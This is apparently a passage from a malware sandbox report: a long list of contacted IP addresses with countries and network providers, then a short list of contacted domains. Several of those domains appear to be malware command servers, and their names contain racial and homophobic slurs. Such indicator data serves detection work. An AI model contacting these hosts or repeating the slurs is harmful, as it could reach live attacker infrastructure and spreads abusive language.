8426 CLARANET-ASClaraNETLTDGB false
23.80.248.89
 unknown United States
395954 LEASEWEB-USA-LAX-11US false
102.114.80.114
 unknown Mauritius
23889 MauritiusTelecomMU false
16.189.44.15
 unknown United States
unknown unknown false
35.88.236.193
 unknown United States
237 MERIT-AS-14US false
65.101.93.119
 unknown United States
209 CENTURYLINK-US-LEGACY-QWESTUS false
207.104.30.77
 unknown United States
7018 ATT-INTERNET4US false
96.217.215.165
 unknown United States
7922 COMCAST-7922US false
89.188.35.13
 unknown Montenegro
40981 UNIVCGME false
39.141.26.147
 unknown China
9808 CMNET-GDGuangdongMobileCommunicationCoLtdCN false
187.246.15.139
 unknown Mexico
13999 MegaCableSAdeCVMX false
182.236.227.177
 unknown China
37943 CNNIC-GIANTZhengZhouGIANTComputerNetworkTechnologyCo false
14.161.21.244
 unknown Viet Nam
45899 VNPT-AS-VNVNPTCorpVN false
107.207.67.246
 unknown United States
7018 ATT-INTERNET4US false
91.21.45.242
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
82.237.254.72
 unknown France
12322 PROXADFR false
18.41.239.101
 unknown United States
3 MIT-GATEWAYSUS false
108.221.191.75
 unknown United States
7018 ATT-INTERNET4US false
197.91.89.236
 unknown South Africa
10474 OPTINETZA false
202.92.217.47
 unknown New Zealand
56186 DIGINET-NZDigitalIslandLtdNZ false
139.224.128.150
 unknown China
37963 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd false
86.119.95.172
 unknown Switzerland
559 SWITCHPeeringrequestspeeringswitchchEU false
208.108.156.39
 unknown United States
26898 LNOCA-ORGUS false
149.241.51.118
 unknown United Kingdom
5607 BSKYB-BROADBAND-ASGB false
154.123.58.182
 unknown Kenya
12455 JAMBONETKE false
135.93.11.224
 unknown United States
10455 LUCENT-CIOUS false
40.195.39.47
 unknown United States
4249 LILLY-ASUS false
150.183.75.7
 unknown Korea Republic of
1237 KREONET-AS-KRKISTIKR false
66.194.37.90
 unknown United States
40455 MAPCOEXPRESSUS false
219.54.86.102
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
212.143.56.90
 unknown Israel
1680 NV-ASNCELLCOMltdIL false
41.195.173.30
 unknown South Africa
16637 MTNNS-ASZA false
4.150.83.212
 unknown United States
3356 LEVEL3US false
138.71.93.64
 unknown Australia
15589 ASN-CLOUDITALIAIT false
66.230.212.143
 unknown United States
3064 AFFINITY-FTLUS false
25.61.160.40
 unknown United Kingdom
7922 COMCAST-7922US false
198.180.231.97
 unknown United States
11714 NETWORKNEBRASKAUS false
114.215.13.70
 unknown China
37963 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd false
153.227.35.198
 unknown Japan 4713 OCNNTTCommunicationsCorporationJP false
209.44.147.227
 unknown United States
17306 RISE-BROADBANDUS false
88.166.217.99
 unknown France
12322 PROXADFR false
56.174.95.156
 unknown United States
2686 ATGS-MMD-ASUS false
116.24.255.31
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
23.201.1.95
 unknown United States
16625 AKAMAI-ASUS false
219.190.91.105
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
203.133.74.242
 unknown Taiwan; Republic of China (ROC)
132046 SUNBRIDGE-PH-AS-AP3705Westofayala252SenGilPuyatAve false
55.129.154.9
 unknown United States
1541 DNIC-ASBLK-01534-01546US false
61.80.6.155
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
191.29.47.18
 unknown Brazil
26599 TELEFONICABRASILSABR false
122.213.81.166
 unknown Japan 17506 UCOMARTERIANetworksCorporationJP false
133.4.113.1
 unknown Japan 55384 JAIST-EXPJapanAdvancedInstituteofScienceandTechnology false
157.202.103.96
 unknown United States
1759 TSF-IP-CORETeliaFinlandOyjEU false
144.117.158.49
 unknown United States
3634 SFASU-ASUS false
123.215.253.202
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR false
66.134.108.67
 unknown United States
18566 MEGAPATH5-US false
122.231.246.73
 unknown China
134771 CHINATELECOM-ZHEJIANG-WENZHOU-IDCWENZHOUZHEJIANGProvince false
47.235.55.148
 unknown United States
45102 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC false
162.164.57.68
 unknown United States
21928 T-MOBILE-AS21928US false
114.35.34.109
 unknown Taiwan; Republic of China (ROC)
3462 HINETDataCommunicationBusinessGroupTW false

Contacted Domains

Name IP Active
yellowchink.pirate 45.156.86.24 true
chinklabs.dyn 185.150.24.67 true
chinklabs.dyn. [malformed] unknown unknown
netfags.geek. [malformed] unknown unknown